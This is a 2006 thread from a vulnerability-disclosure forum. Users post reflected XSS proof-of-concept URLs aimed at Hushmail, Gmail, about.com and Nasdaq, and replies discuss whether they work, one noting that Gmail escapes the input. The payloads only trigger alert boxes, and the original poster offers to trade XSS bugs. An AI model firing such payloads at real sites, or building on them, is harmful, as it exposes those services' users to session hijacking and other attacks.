Cenzic 232 Patent
Paid Advertising
sla.ckers.org is
ha.ckers sla.cking
Sla.ckers.org
Where you should disclose your vulnerabilities. Go read RFPolicy if you want to do responsible disclosure, and go here for when all else fails. 
Go to Topic: PreviousNext
Go to: Forum ListMessage ListNew TopicSearchLog In
Some XSS
Posted by: lobas
Date: December 14, 2006 05:35PM

Secure hushmail is not very secure
https://mailserver2.hushmail.com/hushmail/folderlist/showFolderListPane.php?PHPSESSID=hm002f84798748f13acefafeb6181dbba0%22%3E%3Cscript%3Ealert('VULNERABLE')%3C/script%3E

dont know what this is but its some kind of loop within gmail

http://mail.google.com/mail/?&ik=%22%3E%3CBODY%20ONLOAD=alert('XSS')%3E&fs=1
think it also disables account after so often

http://search.about.com/fullsearch.htm?terms=%22%3E%3Cscript%3Ealert('VULNERABLE')%3C/script%3E

http://quotes.nasdaq.com/quote.dll?mode=stock&page=quick&symbol=c%22%3E%3Cscript%3Ealert('VULNERABLE')%3C/script%3E

Options: ReplyQuote
Re: Some XSS
Posted by: maluc
Date: December 14, 2006 08:19PM

hrm.. the google one just throws me into an infinite redirect loop.. using firefox

-maluc

Options: ReplyQuote
Re: Some XSS
Posted by: unsticky
Date: December 21, 2006 10:00PM

the google one won't work, its escaped. look at the source

<html><head><meta content="text/html; charset=UTF-8" http-equiv="content-type"></head><script>D=(top.js&&top.js.init)?function(d){top.js.P(window,d)}:function(){};if(window==top){top.location="/mail/?ik\u003d%22%3E%3CBODY%20ONLOAD\u003dalert(\'XSS\')%3E&fs\u003d1";}</script><script><!--
D(["v","niftdo8tdmwu","9930dc54804b344a","35","1","10gyqhhmabuzq"]
);
D(["lgn"]);

//--></script><script>var loaded=true;D(['e',3,1166759982916]);</script>

Options: ReplyQuote
Re: Some XSS
Posted by: lobas
Date: January 10, 2007 09:40AM

im looking for XSS with google or some kind of bug ill trade some XSS for it :P

Options: ReplyQuote


Sorry, only registered users may post in this forum.